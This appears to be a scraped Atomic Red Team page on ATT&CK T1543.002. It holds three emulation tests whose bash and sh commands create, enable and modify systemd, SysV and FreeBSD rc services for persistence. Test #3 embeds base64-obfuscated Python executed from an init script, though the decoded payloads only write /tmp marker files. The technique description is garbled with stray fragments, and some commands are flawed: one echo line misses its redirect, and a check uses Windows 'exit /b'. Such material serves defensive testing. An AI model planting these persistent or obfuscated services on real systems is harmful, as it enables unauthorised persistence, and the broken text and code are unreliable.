T1543.002
Create or Modify System Process: SysV/Systemd Service
Description from ATT&CK
Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Systemd utilizes unit configuration files with the 1
.service
1
/systemd/system
1
/
1
/systemd/user
1
$HOME
Inside the 1
.service
1
ExecStart
1
ExecStartPre
1
ExecStartPost
1
systemctl
1
ExecReload
1
ExecStop
1
ExecStopPre
1
ExecStopPost
Adversaries have created new service files, altered the commands a 1
.service
1
.service
Atomic Tests
Atomic Test #1 - Create Systemd Service
This test creates a Systemd service unit file and enables it as a service.
Supported Platforms: linux
auto_generated_guid: d9e4f24f-aa67-4c6e-bcbf-85622b697a7c
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| systemd_service_path | Path to systemd service unit file | path | /etc/systemd/system |
| systemd_service_file | File name of systemd service unit file | string | art-systemd-service.service |
| execstoppost_action | ExecStopPost action for Systemd service | string | /bin/touch /tmp/art-systemd-execstoppost-marker |
| execreload_action | ExecReload action for Systemd service | string | /bin/touch /tmp/art-systemd-execreload-marker |
| execstart_action | ExecStart action for Systemd service | string | /bin/touch /tmp/art-systemd-execstart-marker |
| execstop_action | ExecStop action for Systemd service | string | /bin/touch /tmp/art-systemd-execstop-marker |
| execstartpre_action | ExecStartPre action for Systemd service | string | /bin/touch /tmp/art-systemd-execstartpre-marker |
| execstartpost_action | ExecStartPost action for Systemd service | string | /bin/touch /tmp/art-systemd-execstartpost-marker |
Attack Commands: Run with bash!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
echo "[Unit]" > #{systemd_service_path}/#{systemd_service_file}
echo "Description=Atomic Red Team Systemd Service" >> #{systemd_service_path}/#{systemd_service_file}
echo "" >> #{systemd_service_path}/#{systemd_service_file}
echo "[Service]" >> #{systemd_service_path}/#{systemd_service_file}
echo "Type=simple"
echo "ExecStart=#{execstart_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStartPre=#{execstartpre_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStartPost=#{execstartpost_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecReload=#{execreload_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStop=#{execstop_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "ExecStopPost=#{execstoppost_action}" >> #{systemd_service_path}/#{systemd_service_file}
echo "" >> #{systemd_service_path}/#{systemd_service_file}
echo "[Install]" >> #{systemd_service_path}/#{systemd_service_file}
echo "WantedBy=default.target" >> #{systemd_service_path}/#{systemd_service_file}
systemctl daemon-reload
systemctl enable #{systemd_service_file}
systemctl start #{systemd_service_file}
Cleanup Commands:
1
2
3
4
5
systemctl stop #{systemd_service_file}
systemctl disable #{systemd_service_file}
rm -rf #{systemd_service_path}/#{systemd_service_file}
systemctl daemon-reload
Atomic Test #2 - Create SysV Service
This test creates a SysV service unit file and enables it as a service.
Supported Platforms: freebsd
auto_generated_guid: 760fe8d2-79d9-494f-905e-a239a3df86f6
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| rc_service_path | Path to rc service file | path | /usr/local/etc/rc.d |
| rc_service_file | File name of rc service file | string | art-test |
Attack Commands: Run with sh!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
echo '#\!/bin/sh' > #{rc_service_path}/#{rc_service_file}
echo ' ' >> #{rc_service_path}/#{rc_service_file}
echo '#' >> #{rc_service_path}/#{rc_service_file}
echo '# PROVIDE: art-test' >> #{rc_service_path}/#{rc_service_file}
echo '# REQUIRE: LOGIN' >> #{rc_service_path}/#{rc_service_file}
echo '# KEYWORD: shutdown' >> #{rc_service_path}/#{rc_service_file}
echo ' ' >> #{rc_service_path}/#{rc_service_file}
echo '. /etc/rc.subr' >> #{rc_service_path}/#{rc_service_file}
echo ' ' >> #{rc_service_path}/#{rc_service_file}
echo 'name="art_test"' >> #{rc_service_path}/#{rc_service_file}
echo 'rcvar=art_test_enable' >> #{rc_service_path}/#{rc_service_file}
echo 'load_rc_config ${name}' >> #{rc_service_path}/#{rc_service_file}
echo 'command="/usr/bin/touch"' >> #{rc_service_path}/#{rc_service_file}
echo 'start_cmd="art_test_start"' >> #{rc_service_path}/#{rc_service_file}
echo '' >> #{rc_service_path}/#{rc_service_file}
echo 'art_test_start()' >> #{rc_service_path}/#{rc_service_file}
echo '{' >> #{rc_service_path}/#{rc_service_file}
echo ' ${command} /tmp/art-test.marker' >> #{rc_service_path}/#{rc_service_file}
echo '}' >> #{rc_service_path}/#{rc_service_file}
echo ' ' >> #{rc_service_path}/#{rc_service_file}
echo 'run_rc_command "$1"' >> #{rc_service_path}/#{rc_service_file}
chmod +x #{rc_service_path}/#{rc_service_file}
service art-test enable
service art-test start
Cleanup Commands:
1
2
3
sysrc -x art_test_enable
rm -f #{rc_service_path}/#{rc_service_file}
Atomic Test #3 - Create Systemd Service file, Enable the service , Modify and Reload the service.
This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process.
Supported Platforms: linux
auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89
Inputs:
None
Attack Commands: Run with bash! Elevation Required (e.g. root or admin)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
cat > /etc/init.d/T1543.002 << EOF
#!/bin/bash
### BEGIN INIT INFO
# Provides : Atomic Test T1543.002
# Required-Start: $all
# Required-Stop :
# Default-Start: 2 3 4 5
# Default-Stop:
# Short Description: Atomic Test for Systemd Service Creation
### END INIT INFO
python3 -c "import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))"
EOF
chmod +x /etc/init.d/T1543.002
if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi ;
systemctl enable T1543.002
systemctl start T1543.002
echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002
systemctl daemon-reload
systemctl restart T1543.002
Cleanup Commands:
1
2
3
4
5
systemctl stop T1543.002
systemctl disable T1543.002
rm -rf /etc/init.d/T1543.002
systemctl daemon-reload
Dependencies: Run with bash!
Description: System must be Ubuntu ,Kali OR CentOS.
Check Prereq Commands:
1
2
if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi;
Get Prereq Commands:
1
2
echo Please run from Ubuntu ,Kali OR CentOS.